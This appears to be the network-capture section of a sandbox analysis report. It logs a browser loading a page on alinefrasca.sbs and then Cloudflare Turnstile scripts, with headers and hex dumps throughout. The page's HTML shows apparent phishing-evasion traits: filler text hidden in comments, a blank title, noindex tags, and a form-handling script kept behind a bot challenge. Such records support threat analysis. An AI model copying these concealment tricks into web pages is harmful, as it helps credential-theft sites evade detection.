                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:12 UTC1010INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:11 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            x-powered-by: PHP/7.3.33
                                                                            access-control-allow-origin: *
                                                                            set-cookie: PHPSESSID=0vnljmd907ev27c68sitpt9phh; path=/
                                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate
                                                                            pragma: no-cache
                                                                            vary: Accept-Encoding
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LReQ1Q%2BxWGNSjmnFplisgkZTpmnzXusfNlfkqgaeXqrh%2BiU8AiWjK6qktQ4AhcEDeMLTGIseWuqIOv9GOU0tdElcgoJc04J3snEFff9bVJlFzI1ShI5OmVyUffPs3LkJYOo%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998c54f160c23-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1242&delivery_rate=1796526&cwnd=251&unsent_bytes=0&cid=b9bbbe7bcb43dd05&ts=368&x=0"
                                                                            2024-10-28 08:36:12 UTC359INData Raw: 38 35 36 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 41 20 6d 75 73 63 6c 65 20 69 73 20 6c 69 6b 65 20 61 20 63 61 72 2e 20 49 66 20 79 6f 75 20 77 61 6e 74 20 69 74 20 74 6f 20 72 75 6e 20 77 65 6c 6c 20 65 61 72 6c 79 20 69 6e 20 74 68 65 20 6d 6f 72 6e 69 6e 67 2c 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
                                                                            Data Ascii: 856<html lang="en"><head><title></title>... <span>A muscle is like a car. If you want it to run well early in the morning,</span> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><meta name="viewport" content="widt
                                                                            2024-10-28 08:36:12 UTC1369INData Raw: 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 79 6f 75 e2 80 99 72 65 20 6e 6f 74 20 67 6f 69 6e 67 20 61 6e 79 77 68 65 72 65 3a 20 44 72 65 61 6d 73 20 6e 65 65 64 20 64 72 69 76 65 20 74 6f 20 62 65 63 6f 6d 65 20 72 65 61 6c 69 74 79 2e 20 2d 2d 3e 0a 09 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 7d 2e 66 73 2d 35 7b 66 6f 6e 74 2d
                                                                            Data Ascii: ></script>... youre not going anywhere: Dreams need drive to become reality. --><style>body{font-family:Arial,sans-serif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-
                                                                            2024-10-28 08:36:12 UTC413INData Raw: 70 72 6f 76 69 64 65 20 6e 61 74 75 72 61 6c 20 73 75 67 61 72 73 20 66 6f 72 20 61 20 71 75 69 63 6b 20 65 6e 65 72 67 79 20 62 6f 6f 73 74 3a 20 46 72 75 69 74 73 20 61 72 65 20 61 20 6e 61 74 75 72 61 6c 20 73 6f 75 72 63 65 20 6f 66 20 65 6e 65 72 67 79 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 21 2d 2d 20 3c 70 3e 41 20 63 61 72 20 69 73 20 6c 69 6b 65 20 61 20 6d 6f 74 68 65 72 2d 69 6e 2d 6c 61 77 3a 20 49 74 20 63 61 6e 20 62 65 20 63 68 61 6c 6c 65 6e 67 69 6e 67 2c 20 62 75 74 20 69 74 e2 80 99 73 20 70 61 72 74 20 6f 66 20 6c 69 66 65 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 61 6c 61 72 79 28 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b
                                                                            Data Ascii: provide natural sugars for a quick energy boost: Fruits are a natural source of energy.</span> --></div></div>... <p>A car is like a mother-in-law: It can be challenging, but its part of life.</p> --><script>function salary() {document.forms[
                                                                            2024-10-28 08:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449742104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:12 UTC543OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:12 UTC386INHTTP/1.1 302 Found
                                                                            Date: Mon, 28 Oct 2024 08:36:12 GMT
                                                                            Content-Length: 0
                                                                            Connection: close
                                                                            access-control-allow-origin: *
                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                            cross-origin-resource-policy: cross-origin
                                                                            location: /turnstile/v0/b/e1a56f38220d/api.js
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998cccc5e2caa-DFW
                                                                            alt-svc: h3=":443"; ma=86400


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449744104.18.94.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:15 UTC558OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:15 UTC471INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:15 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 47672
                                                                            Connection: close
                                                                            accept-ranges: bytes
                                                                            last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                            access-control-allow-origin: *
                                                                            cross-origin-resource-policy: cross-origin
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9998dbeedce82f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:15 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                            Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                            Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                            Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                            Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                            Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                            2024-10-28 08:36:15 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                            Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449743184.28.90.27443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:15 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
                                                                            2024-10-28 08:36:15 UTC467INHTTP/1.1 200 OK
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            Content-Type: application/octet-stream
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            Server: ECAcc (lpl/EF06)
                                                                            X-CID: 11
                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                            X-Ms-Region: prod-weu-z1
                                                                            Cache-Control: public, max-age=188313
                                                                            Date: Mon, 28 Oct 2024 08:36:15 GMT
                                                                            Connection: close
                                                                            X-CID: 2


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449745104.18.95.414431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:16 UTC798OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/ HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-Dest: iframe
                                                                            Referer: https://alinefrasca.sbs/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:16 UTC1362INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:16 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 26659
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                            cross-origin-embedder-policy: require-corp
                                                                            cross-origin-opener-policy: same-origin
                                                                            cross-origin-resource-policy: cross-origin
                                                                            origin-agent-cluster: ?1
                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            referrer-policy: same-origin
                                                                            document-policy: js-profiling
                                                                            2024-10-28 08:36:16 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 39 39 38 65 34 38 62 63 30 65 39 38 62 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                            Data Ascii: Server: cloudflareCF-RAY: 8d9998e48bc0e98b-DFWalt-svc: h3=":443"; ma=86400
